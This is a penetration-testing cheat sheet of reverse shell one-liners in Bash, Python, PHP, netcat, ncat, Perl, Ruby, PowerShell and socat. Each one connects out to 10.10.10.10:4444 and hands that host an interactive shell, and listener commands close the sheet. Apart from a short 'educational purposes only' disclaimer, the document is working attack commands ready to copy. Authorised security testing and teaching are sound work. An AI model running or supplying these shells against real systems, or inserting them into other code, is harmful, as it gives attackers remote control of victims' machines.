Cheatsheet

Reverse Shells

Collection of reverse shell commands for penetration testing.

Educational purposes only. Only use these on systems you own or have explicit permission to test.

Bash

Bash TCP

Basic bash reverse shell over TCP

bash -i >& /dev/tcp/10.10.10.10/4444 0>&1

Bash UDP

Bash reverse shell over UDP

bash -i >& /dev/udp/10.10.10.10/4444 0>&1

Python

Python 3

Python 3 reverse shell

python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Python PTY

Python with PTY

python -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.10.10",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'

PHP

PHP exec

PHP reverse shell using exec

php -r '$sock=fsockopen("10.10.10.10",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

PHP proc_open

PHP using proc_open

php -r '$sock=fsockopen("10.10.10.10",4444);$proc=proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'

Netcat

Netcat -e

Traditional netcat with -e flag

nc -e /bin/sh 10.10.10.10 4444

Netcat mkfifo

Netcat without -e (OpenBSD)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4444 >/tmp/f

Ncat SSL

Encrypted reverse shell

ncat --ssl 10.10.10.10 4444 -e /bin/sh

Perl

Perl reverse shell

perl -e 'use Socket;$i="10.10.10.10";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'

Ruby

Ruby reverse shell

ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PowerShell

PowerShell reverse shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Socat

Basic socat reverse shell

socat TCP:10.10.10.10:4444 EXEC:/bin/sh

Socat TTY

Socat with full TTY

socat TCP:10.10.10.10:4444 EXEC:"/bin/bash",pty,stderr,setsid,sigint,sane

Start Listener

nc -lvnp 4444

rlwrap nc -lvnp 4444